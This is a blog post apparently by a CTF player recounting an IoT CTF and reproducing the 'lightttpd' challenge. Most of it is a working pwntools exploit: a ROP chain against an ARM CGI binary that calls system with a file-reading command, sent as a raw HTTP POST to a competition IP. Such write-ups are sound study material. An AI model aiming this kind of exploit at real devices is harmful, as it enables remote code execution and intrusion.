Warning
This post was last updated on 2022-03-23; its content may be out of date.
We took third place in this competition, sob. It was all Long-ge (龙哥) carrying us; right as the competition was about to end we solved one standalone IoT challenge. Personally I think the main problem was that we were not familiar enough with the board: just getting connected to it ate up a huge amount of time and effort, and by the end of the competition we still had not gotten a shell on it.
Because of the COVID outbreak in Xiaoshan, Hangzhou, I cannot return to campus and have to quarantine at home for 14 days. I'm taking the opportunity to play with this board, reproduce the competition challenges, and hopefully do better next year.
The challenge links and the official writeups are at https://github.com/DasSecurity-HatLab/IoT-CTF-2021
These days I'm preparing some material for Hufu (虎符) PKS, so this part may be updated a bit later.
[collapse title="Writeup"]
lightttpd
```python
# Python 2 / pwntools exploit script for the lightttpd challenge (55.cgi, ARM, run under qemu-arm locally)
from pwn import *
#from Crypto.Util.number import *
#context.log_level = "debug"
context.binary = "./55.cgi"

# Addresses taken from the challenge binary 55.cgi
exit_addr = 0x00010D14
add_sp = 0x000108b8
bss_addr = 0x00022088
puts_addr = 0x00010708
fread_addr = 0x000106F0
pop_r3_addr = 0x0001066c
mov_r0_r7 = 0x00010ec4
pop_fp_addr = 0x00010998
system_addr = 0x10720
show_leak_addr = 0x00010D0C

# Values popped into r4..r8, followed by the return address (system)
ROP_chain = [
    0,          # r4
    0,          # r5
    0,          # r6
    0x00022088, # r7
    0,          # r8
    system_addr,
]
print hex(len(flat(ROP_chain)))

# Build the POST body: magic prefix, padding, ROP chain, command string, then the add_sp gadget
query = "*#$^" + '\xFF' * 3 + '\xFF\xFF'
query = query.ljust(0x200, 'x')
query += flat(ROP_chain).ljust(0x9E, 'p')
#query = query.ljust(0x2FD - 0x4D, 'a')
x = "cat /ro*/*;"
x += 'a' * ((0x2f4 - len(x)))
x = x[:0x2f4]
query += 'b' * 0x12 + x + 'c' * 4 + p32(add_sp)

DEBUG = 0
if DEBUG:
    # Local run: hand the CGI its environment directly and attach gdb via qemu's -g port
    env = {
        "HTTP_COOKIES": "uuid=nocbtm@hatlab!!!",
        "REQUEST_METHOD" : "POST",
        "CONTENT_TYPE" : "application/x-www-form-urlencoded",
        "CONTENT_LENGTH": str(len(query))
    }
    sh = process(["qemu-arm", "-g", "1234", "-L", "/usr/arm-linux-gnueabi/", "55.cgi"], env=env)
    sh.send(query)
    # sh.send(payload)
    sh.interactive()
else:
    # Remote run: wrap the body in a raw HTTP request (blank line separates headers from body)
    sh = remote('114.5.32.22', 80)
    data = '''POST /cgi-bin/55.cgi HTTP/1.1
Host: 114.5.32.22
Cookies: uuid=nocbtm@hatlab!!!
Content-Length: {}
Content-Type: application/x-www-form-urlencoded

{}'''.replace('\n', '\r\n').format(len(query), query)
    sh.send(data)
    sh.interactive()

# sh.send(query)
# # payload = p32(exit_addr) * 0xEE + p32(0x00010D0C)
# # query = "*#$^" + '\xFF' * 3 + '\xFF' + '\xF7'
# # filp_size = 0x2FD + 4 - 0x4D - len(payload)
# # all_data = ('a' * 5 + p32(0x00010D0C) * ((filp_size / 4) - 3)).ljust(0x2FD - 0x4D - 5, 'a')
#
# #nocbtm@hatlab!!!
#sh.recvuntil('\r\n\r\n')
#data = sh.recvuntil("No Authentication", drop=True)
#print long_to_bytes(int(data, 16))[::-1]
# sh.interactive()
```
[/collapse]
[collapse title="On-site photos"]
[/collapse]